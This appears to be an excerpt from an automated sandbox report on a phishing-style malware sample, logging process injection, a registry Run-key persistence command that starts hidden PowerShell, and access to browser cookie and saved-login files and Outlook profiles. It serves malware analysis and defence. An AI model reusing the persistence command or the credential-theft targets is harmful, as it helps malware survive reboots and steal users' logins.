Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\fc.exe

Thread register set: target process: 2496

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Minken.exe base address: 400000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Minken.exe base: 1660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Minken.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Minken.exe "C:\Users\user\AppData\Local\Temp\Minken.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "paraferingen" /t reg_expand_sz /d "%uhelds% -windowstyle minimized $sivsanger=(get-itemproperty -path 'hkcu:\arkitekttegningers\').daughterling;%uhelds% ($sivsanger)"
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "paraferingen" /t reg_expand_sz /d "%uhelds% -windowstyle minimized $sivsanger=(get-itemproperty -path 'hkcu:\arkitekttegningers\').daughterling;%uhelds% ($sivsanger)"			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Code function: 0_2_0040604F GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040604F

Stealing of Sensitive Information

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Source: C:\Windows\SysWOW64\fc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY